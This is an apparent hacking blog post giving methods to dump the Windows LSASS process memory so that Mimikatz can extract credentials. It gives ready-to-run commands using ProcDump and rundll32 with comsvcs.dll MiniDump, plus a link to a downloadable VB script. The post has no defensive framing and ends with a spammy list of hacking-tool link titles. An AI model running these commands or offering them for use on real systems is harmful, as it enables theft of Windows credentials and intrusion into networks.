14 April 2020

LSASS Dumping Methods ( For Mimikatz )


In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.


Here are some of the important methods,

Using ProcDump :

1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"


Using VB Script :

Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp













rundll32 Command :

Essentially previous method VBS script is using following command for dumping Lsass.exe process

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.



















More information


  1. Best Pentesting Tools 2018
  2. Pentest Tools Github
  3. How To Make Hacking Tools
  4. Pentest Tools Review
  5. Hacking Tools And Software
  6. Pentest Tools Kali Linux
  7. Pentest Tools Free
  8. Pentest Tools For Windows
  9. Hack Tool Apk No Root
  10. Pentest Tools For Ubuntu
  11. Hacking Tools 2019
  12. Hack Tools Pc
  13. Tools 4 Hack
  14. Hacking Tools For Games
  15. Hacking App
  16. World No 1 Hacker Software
  17. Hacker Tools Github
  18. Hack Tools For Pc
  19. Hacker Tools Linux
  20. Hacking Tools For Windows
  21. Hacking Tools 2019
  22. Hack Website Online Tool
  23. Pentest Tools Review
  24. Hack Tools Online
  25. Hacker Tools List
  26. Hacking Tools 2020
  27. Nsa Hack Tools
  28. Hacking Tools For Windows Free Download
  29. Pentest Tools Online

No comments:

Post a Comment